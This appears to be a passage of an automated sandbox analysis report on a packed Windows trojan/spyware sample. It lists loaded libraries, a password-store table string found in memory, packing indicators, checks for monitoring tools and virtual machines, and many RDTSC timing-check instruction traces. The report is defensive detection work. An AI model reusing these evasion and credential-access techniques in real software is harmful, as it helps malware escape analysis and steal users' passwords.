              Source: yO9EAqDV15.exe | Static PE information: Section: nhmyvknl ZLIB complexity 0.994432571935725
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: yO9EAqDV15.exe, 00000000.00000003.1981268875.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981842842.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: yO9EAqDV15.exe | ReversingLabs: Detection: 57%
              Source: yO9EAqDV15.exe | Virustotal: Detection: 50%
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | File read: C:\Users\user\Desktop\yO9EAqDV15.exe
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Section loaded: version.dll
              Source: yO9EAqDV15.exe | Static file information: File size 1884672 > 1048576
              Source: yO9EAqDV15.exe | Static PE information: Raw size of nhmyvknl is bigger than: 0x100000 < 0x1a2200

              Data Obfuscation

              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Unpacked PE file: 0.2.yO9EAqDV15.exe.cb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nhmyvknl:EW;wbokqakx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nhmyvknl:EW;wbokqakx:EW;.taggant:EW;
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: yO9EAqDV15.exe | Static PE information: real checksum: 0x1ce582 should be: 0x1cd2ac
              Source: yO9EAqDV15.exe | Static PE information: section name:
              Source: yO9EAqDV15.exe | Static PE information: section name: .idata
              Source: yO9EAqDV15.exe | Static PE information: section name:
              Source: yO9EAqDV15.exe | Static PE information: section name: nhmyvknl
              Source: yO9EAqDV15.exe | Static PE information: section name: wbokqakx
              Source: yO9EAqDV15.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Code function: 0_3_05F76BAF push EB8E9FB1h; iretd 0_3_05F76BBB
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Code function: 0_3_05F7699A push ecx; retf 0_3_05F769C0
              Source: yO9EAqDV15.exe | Static PE information: section name: entropy: 7.984642934017876
              Source: yO9EAqDV15.exe | Static PE information: section name: nhmyvknl entropy: 7.953955254723583

              Boot Survival

              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB4CAF second address: EB4CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Fh 0x00000007 jmp 00007F7F08BA1E48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E69D5F second address: E69D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB93AC second address: EB93D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E3Dh 0x00000009 pop ebx 0x0000000a jmp 00007F7F08BA1E49h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB93D7 second address: EB93DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB93DD second address: EB93E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F08BA1E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9545 second address: EB9549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9549 second address: EB9563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9887 second address: EB988B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB988B second address: EB988F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB988F second address: EB98B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7F08F64186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F7F08F64198h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB98B7 second address: EB98D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E47h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB98D4 second address: EB98D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EB9BC3 second address: EB9BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F7F08BA1E36h 0x0000000d jg 00007F7F08BA1E36h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA4D3 second address: EBA541 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F7F08F64197h 0x00000010 pop ecx 0x00000011 popad 0x00000012 add dword ptr [esp], 1E1139F5h 0x00000019 call 00007F7F08F64189h 0x0000001e jne 00007F7F08F64190h 0x00000024 push eax 0x00000025 jmp 00007F7F08F64198h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F08F6418Bh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA541 second address: EBA56A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F7F08BA1E3Ch 0x00000013 jnl 00007F7F08BA1E36h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA56A second address: EBA58C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F08F6418Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F7F08F6418Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBA9A7 second address: EBA9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA4E second address: EBAA52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA52 second address: EBAA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA58 second address: EBAA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64195h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA71 second address: EBAA8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F7F08BA1E3Bh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBAA8B second address: EBAA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBABC0 second address: EBABCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB441 second address: EBB445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB445 second address: EBB449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB71E second address: EBB722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBB7BC second address: EBB7C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBD4A5 second address: EBD4AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBD4AA second address: EBD51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D321Ah], edi 0x00000010 push 00000000h 0x00000012 ja 00007F7F08BA1E3Ch 0x00000018 jmp 00007F7F08BA1E49h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F7F08BA1E38h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 jne 00007F7F08BA1E3Ch 0x0000003f add esi, dword ptr [ebp+122D363Dh] 0x00000045 xchg eax, ebx 0x00000046 push edi 0x00000047 pushad 0x00000048 jbe 00007F7F08BA1E36h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDEE3 second address: EBDEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDD91 second address: EBDD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDEED second address: EBDF0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64192h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDD95 second address: EBDD9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDF0B second address: EBDF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDD9B second address: EBDDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBDF0F second address: EBDF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F7F08F64188h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D35CDh] 0x00000028 clc 0x00000029 push 00000000h 0x0000002b ja 00007F7F08F6418Bh 0x00000031 push 00000000h 0x00000033 stc 0x00000034 push eax 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBE6DF second address: EBE704 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F08BA1E3Ch 0x00000008 jng 00007F7F08BA1E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7F08BA1E42h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0BF7 second address: EC0BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0BFC second address: EC0C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F7F08BA1E36h 0x00000009 jnp 00007F7F08BA1E36h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jl 00007F7F08BA1E36h 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0C19 second address: EC0C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC2B96 second address: EC2BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F7F08BA1E3Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC0C1F second address: EC0C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7C601 second address: E7C609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: E7C609 second address: E7C60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECB30E second address: ECB312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECC386 second address: ECC38B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECD354 second address: ECD358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECD358 second address: ECD3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F7F08F64199h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007F7F08F6418Fh 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D3471h], ecx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F7F08F64188h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000019h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov bx, di 0x0000003f xchg eax, esi 0x00000040 jbe 00007F7F08F6418Eh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECD3C6 second address: ECD3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECC622 second address: ECC627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECE471 second address: ECE485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E40h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECE485 second address: ECE4EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jnl 00007F7F08F64188h 0x00000010 pop ebx 0x00000011 nop 0x00000012 and edi, 040836BCh 0x00000018 mov dword ptr [ebp+122D24A5h], ecx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 add bx, 9A0Ah 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 mov dword ptr [ebp+12486EEAh], esi 0x00000037 jmp 00007F7F08F64192h 0x0000003c mov eax, dword ptr [ebp+122D1451h] 0x00000042 sub bx, D359h 0x00000047 push FFFFFFFFh 0x00000049 mov edi, dword ptr [ebp+122D1FB0h] 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jnl 00007F7F08F64186h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECE4EE second address: ECE4F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED12D6 second address: ED12E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED12E7 second address: ED12ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22C2 second address: ED22C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22C7 second address: ED22D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22D5 second address: ED22D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22D9 second address: ED22DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED22DF second address: ED22E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECF3D9 second address: ECF40B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F7F08BA1E43h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ECF4D3 second address: ECF4FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F7F08F641BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F08F64198h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: ED62AC second address: ED6341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7F08BA1E36h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F7F08BA1E3Fh 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7F08BA1E38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D35F9h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F7F08BA1E38h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 ja 00007F7F08BA1E3Bh 0x00000057 mov edi, dword ptr [ebp+122D1C16h] 0x0000005d push 00000000h 0x0000005f mov ebx, dword ptr [ebp+122D3915h] 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F7F08BA1E43h 0x0000006f rdtsc
